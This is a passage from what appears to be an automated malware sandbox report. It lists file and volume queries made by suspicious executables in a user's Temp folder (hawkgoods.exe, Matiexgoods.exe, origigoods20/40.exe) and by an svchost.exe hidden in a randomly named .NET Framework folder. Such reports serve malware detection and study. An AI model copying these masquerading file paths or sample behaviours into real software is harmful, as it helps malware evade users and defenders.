                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Users\user\AppData\Local\Temp\origigoods40.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\origigoods40.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
